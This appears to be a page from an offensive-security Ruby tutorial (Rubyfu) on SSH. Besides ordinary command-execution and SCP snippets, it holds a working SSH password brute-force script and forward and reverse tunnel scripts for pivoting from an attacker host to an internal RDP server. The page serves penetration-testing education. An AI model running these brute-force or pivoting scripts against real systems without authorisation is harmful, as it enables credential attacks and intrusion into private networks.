Rubyfu
TwitterGithubNEW! Black Hat RubyBuy Me a Coffee
Search…
Primary version
Module 0x0 | Introduction
Contribution
Beginners
Required Gems
Module 0x1 | Basic Ruby Kung Fu
Module 0x2 | System Kung Fu
Module 0x3 | Network Kung Fu
Ruby Socket
SSL/TLS
SSID Finder
FTP
SSH
Email
Network Scanning
DNS
SNMP Enumeration
Packet Manipulation
Memcached
AMQP
Module 0x4 | Web Kung Fu
Module 0x5 | Exploitation Kung Fu
Module 0x6 | Forensic Kung Fu
Module 0x7 | OSINT Kung Fu
References
FAQs
Contributors
Powered By GitBook
SSH
Here we'll show some SSH using ruby. We'll need to install net-ssh gem for that.
    Install net-ssh gem
    1
    gem install net-ssh
    Copied!

Simple SSH command execution

This is a very basic SSH client which sends and executes commands on a remote system
1
#!/usr/bin/env ruby
2
# KING SABRI | @KINGSABRI
3
require 'net/ssh'
4
​
5
@hostname = "localhost"
6
@username = "root"
7
@password = "password"
8
@cmd = ARGV[0]
9
​
10
begin
11
ssh = Net::SSH.start(@hostname, @username, :password => @password)
12
res = ssh.exec!(@cmd)
13
ssh.close
14
puts res
15
rescue
16
puts "Unable to connect to #{@hostname} using #{@username}/#{@password}"
17
end
Copied!

SSH Client with PTY shell

Here a simple SSH client which give you an interactive PTY
1
#!/usr/bin/env ruby
2
# KING SABRI | @KINGSABRI
3
require 'net/ssh'
4
​
5
@hostname = "localhost"
6
@username = "root"
7
@password = "password"
8
​
9
Net::SSH.start(@hostname, @username, :password => @password, :auth_methods => ["password"]) do |session|
10
​
11
# Open SSH channel
12
session.open_channel do |channel|
13
​
14
# Requests that a pseudo-tty (or "pty") for interactive application-like (e.g vim, sudo, etc)
15
channel.request_pty do |ch, success|
16
raise "Error requesting pty" unless success
17
​
18
# Request channel type shell
19
ch.send_channel_request("shell") do |ch, success|
20
raise "Error opening shell" unless success
21
STDOUT.puts "[+] Getting Remote Shell\n\n" if success
22
end
23
end
24
​
25
# Print STDERR of the remote host to my STDOUT
26
channel.on_extended_data do |ch, type, data|
27
STDOUT.puts "Error: #{data}\n"
28
end
29
​
30
# When data packets are received by the channel
31
channel.on_data do |ch, data|
32
STDOUT.print data
33
cmd = gets
34
channel.send_data( "#{cmd}" )
35
trap("INT") {STDOUT.puts "Use 'exit' or 'logout' command to exit the session"}
36
end
37
​
38
channel.on_eof do |ch|
39
puts "Exiting SSH Session.."
40
end
41
​
42
session.loop
43
end
44
end
Copied!

SSH brute force

ssh-bf.rb
1
#!/usr/bin/env ruby
2
# KING SABRI | @KINGSABRI
3
#
4
require 'net/ssh'
5
​
6
def attack_ssh(host, user, password, port=22, timeout = 5)
7
begin
8
Net::SSH.start(host, user, :password => password,
9
:auth_methods => ["password"], :port => port,
10
:paranoid => false, :non_interactive => true, :timeout => timeout ) do |session|
11
puts "Password Found: " + "#{host} | #{user}:#{password}"
12
end
13
​
14
rescue Net::SSH::ConnectionTimeout
15
puts "[!] The host '#{host}' not alive!"
16
rescue Net::SSH::Timeout
17
puts "[!] The host '#{host}' disconnected/timeouted unexpectedly!"
18
rescue Errno::ECONNREFUSED
19
puts "[!] Incorrect port #{port} for #{host}"
20
rescue Net::SSH::AuthenticationFailed
21
puts "Wrong Password: #{host} | #{user}:#{password}"
22
rescue Net::SSH::Authentication::DisallowedMethod
23
puts "[!] The host '#{host}' doesn't accept password authentication method."
24
end
25
end
26
​
27
​
28
hosts = ['192.168.0.1', '192.168.0.4', '192.168.0.50']
29
users = ['root', 'admin', 'rubyfu']
30
passs = ['admin1234', '[email protected]', '123456', 'AdminAdmin', 'secret', coffee]
31
​
32
hosts.each do |host|
33
users.each do |user|
34
passs.each do |password|
35
​
36
attack_ssh host, user, password
37
​
38
end end end
Copied!

SSH Tunneling

Forward SSH Tunnel

1
|--------DMZ------|---Local Farm----|
2
| | |
3
|Attacker| ----SSH Tunnel---> | |SSH Server| <-RDP-> |Web server| |
4
| | |
5
|-----------------|-----------------|
Copied!
Run ssh-ftunnel.rb on the SSH Server
ssh-ftunnel.rb
1
#!/usr/bin/env ruby
2
# KING SABRI | @KINGSABRI
3
require 'net/ssh'
4
​
5
Net::SSH.start("127.0.0.1", 'root', :password => '123132') do |ssh|
6
​
7
ssh.forward.local('0.0.0.0', 3333, "WebServer", 3389)
8
​
9
puts "[+] Starting SSH forward tunnel"
10
ssh.loop { true }
11
end
Copied!
Now connect to the SSH Server on port 3333 via your RDP client, you'll be prompt for the WebServer's RDP log-in screen
1
rdesktop WebServer:3333
Copied!

Reverse SSH Tunnel

1
|--------DMZ------|---Local Farm----|
2
| | |
3
|Attacker| <---SSH Tunnel---- | |SSH Server| <-RDP-> |Web server| |
4
| | | | |
5
`->-' |-----------------|-----------------|
Copied!
Run ssh-rtunnel.rb on the SSH Server
ssh-rtunnel.rb
1
#!/usr/bin/env ruby
2
# KING SABRI | @KINGSABRI
3
require 'net/ssh'
4
​
5
Net::SSH.start("AttacerIP", 'attacker', :password => '123123') do |ssh|
6
​
7
ssh.forward.remote_to(3389, 'WebServer', 3333, '0.0.0.0')
8
​
9
puts "[+] Starting SSH reverse tunnel"
10
ssh.loop { true }
11
end
Copied!
Now SSH from the SSH Server to localhost on the localhost's SSH port then connect from your localhost to your localhost on port 3333 via your RDP client, you'll be prompt for the WebServer's RDP log-in screen
1
rdesktop localhost:3333
Copied!

Copy files via SSH (SCP)

    To install scp gem
    1
    gem install net-scp
    Copied!
    Upload file
1
require 'net/scp'
2
​
3
Net::SCP.upload!(
4
"SSHServer",
5
"root",
6
"/rubyfu/file.txt", "/root/",
7
#:recursive => true, # Uncomment for recursive
8
:ssh => { :password => "123123" }
9
)
Copied!
    Download file
1
require 'net/scp'
2
​
3
Net::SCP.download!(
4
"SSHServer",
5
"root",
6
"/root/", "/rubyfu/file.txt",
7
#:recursive => true, # Uncomment for recursive
8
:ssh => { :password => "123123" }
9
)
Copied!
Previous
FTP
Next
Email
Copy link
Contents
Simple SSH command execution
SSH Client with PTY shell
SSH brute force
SSH Tunneling
Forward SSH Tunnel
Reverse SSH Tunnel
Copy files via SSH (SCP)